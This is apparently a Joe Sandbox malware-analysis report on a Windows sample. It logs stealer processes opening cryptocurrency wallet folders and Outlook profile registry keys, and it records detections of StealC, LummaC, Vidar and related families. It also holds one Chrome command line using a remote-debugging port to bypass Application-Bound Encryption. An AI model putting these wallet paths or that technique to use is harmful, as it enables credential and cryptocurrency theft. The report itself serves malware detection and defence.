Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP

Source: Yara match	File source: 00000018.00000003.2414896441.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2409514945.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2376701157.0000000000C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2413505501.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2413965960.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2392742627.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2407859229.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2420404696.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2412742124.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2420637446.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2413043657.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2415687258.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2404305353.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2415390516.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2411337757.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2421264029.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2413291901.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2418504089.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2419399894.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2417651719.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2420843284.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2415989218.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2404646972.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2405444703.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2408623320.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2400915904.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2444773768.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2431848373.00000000001AC000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2406789937.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2419064479.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2420045386.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2406220397.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2374517009.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2401814629.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2417052352.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2416328008.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2407427652.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2403345264.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2376854459.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2410714480.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2722738319.0000000001541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2412491896.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2722738319.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2416653360.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2407121284.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2393277483.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eb74aeb58b.exe PID: 2340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1f1ada1ce1.exe PID: 7256, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: a103019032.exe PID: 7480, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 382cd038a3.exe PID: 5600, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 13.2.3f28c42ac4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.3f28c42ac4.exe.4b40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.3f28c42ac4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.3f28c42ac4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2717348662.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2177798634.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: eb74aeb58b.exe PID: 2340, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 1f1ada1ce1.exe PID: 7256, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2431848373.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2330839784.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2028635188.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2448228643.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2158030696.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2715340106.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2723505102.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2538106333.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2349197594.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2527946082.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2715346426.0000000000541000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8f4d1353d2.exe PID: 7728, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C630C40 sqlite3_bind_zeroblob,	8_2_6C630C40
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C630D60 sqlite3_bind_parameter_name,	8_2_6C630D60
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C558EA0 sqlite3_clear_bindings,	8_2_6C558EA0
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C630B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	8_2_6C630B40
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C55C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	8_2_6C55C050
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C556070 PR_Listen,	8_2_6C556070
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C55C030 sqlite3_bind_parameter_count,	8_2_6C55C030

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	12 Process Injection	4 Obfuscated Files or Information	Security Account Manager	249 System Information Discovery	SMB/Windows Admin Shares	11 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	111 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	13 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	111 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1171 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	451 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	451 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Mshta	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0xqfQZufeQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: Cryptbot

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
0xqfQZufeQ.exe